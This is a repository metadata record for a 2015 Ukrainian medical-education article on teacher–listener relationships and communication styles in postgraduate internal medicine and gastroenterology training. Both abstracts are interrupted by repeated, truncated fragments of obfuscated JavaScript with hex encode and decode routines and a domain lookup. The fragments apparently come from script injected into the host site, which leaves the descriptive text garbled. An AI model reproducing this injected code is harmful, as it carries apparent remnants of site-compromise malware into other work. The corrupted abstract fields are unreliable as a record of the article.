Показати скорочений опис матеріалу

РОЛЬ ПЕДАГОГІЧНОГО СПІЛКУВАННЯ МІЖ ВИКЛАДАЧАМИ ТА СЛУХАЧАМИ КУРСІВ ПІСЛЯДИПЛОМНОЇ ПІДГОТОВКИ З ТЕРАПІЇ ТА ГАСТРОЕНТЕРОЛОГІЇ В ОПТИМІЗАЦІЇ НАВЧАЛЬНОГО ПРОЦЕСУ

dc.creatorStepanov, Y. M.
dc.creatorKononov, I. M.
dc.creatorBudzak, I. Y.
dc.creatorKosynska, S. V.
dc.creatorSalenko, A. V.
dc.date2015-12-15
dc.date.accessioned2019-08-26T19:43:41Z
dc.date.available2019-08-26T19:43:41Z
dc.identifierhttps://ojs.tdmu.edu.ua/index.php/med_osvita/article/view/5323
dc.identifier10.11603/me.v0i4.5323
dc.identifier.urihttps://repository.tdmu.edu.ua/handle/123456789/11463
dc.descriptionThe article is devoted to the psychology of relationships between teacher and doctors undergoing postgraduate training. We consider four types of relationships between the teacher and the listener. It is noted the importance of achieving the authority of the teacher in the eyes of the listeners. The article also shows the styles of pedagogical communication between the teacher and the listener. Separately, there are described the didactic principles of the educational process. // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;een-US
dc.descriptionСтаття присвячена питанням психології взаємовідносин між викладачем та лікарями, що проходять післядипломне навчання. Розглянуті чотири типи взаємовідносин між викладачем і слухачем. Наголошено на важливості досягнення авторитету викладача в очах слухачів. Також в статті показані стилі педагогічного спілкування між викладачем і слухачем. Окремо описані дидактичні принципи навчального процесу.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;euk-UA
dc.formatapplication/pdf
dc.languageukr
dc.publisherTernopil State Medical Universityuk-UA
dc.relationhttps://ojs.tdmu.edu.ua/index.php/med_osvita/article/view/5323/4892
dc.rightsАвторське право (c) 2015 Медична освітаuk-UA
dc.sourceMedical Education; No 4 (2015)en-US
dc.sourceМедична освіта; № 4 (2015)uk-UA
dc.source2414-5998
dc.source1681-2751
dc.source10.11603/me.v0i4
dc.titleROLE OF PEDAGOGICAL COMMUNICATION BETWEEN TEACHERS AND STUDENTS OF POST-GRADUATE TRAINING IN INTERNAL MEDICINE AND GASTROENTEROLOGY IN THE OPTIMIZATION OF THE EDUCATIONAL PROCESSen-US
dc.titleРОЛЬ ПЕДАГОГІЧНОГО СПІЛКУВАННЯ МІЖ ВИКЛАДАЧАМИ ТА СЛУХАЧАМИ КУРСІВ ПІСЛЯДИПЛОМНОЇ ПІДГОТОВКИ З ТЕРАПІЇ ТА ГАСТРОЕНТЕРОЛОГІЇ В ОПТИМІЗАЦІЇ НАВЧАЛЬНОГО ПРОЦЕСУuk-UA
dc.typeinfo:eu-repo/semantics/article
dc.typeinfo:eu-repo/semantics/publishedVersion


Долучені файли

ФайлРозмірФорматПереглянути

Даний матеріал не має долучених файлів.

Даний матеріал зустрічається у наступних фондах

Показати скорочений опис матеріалу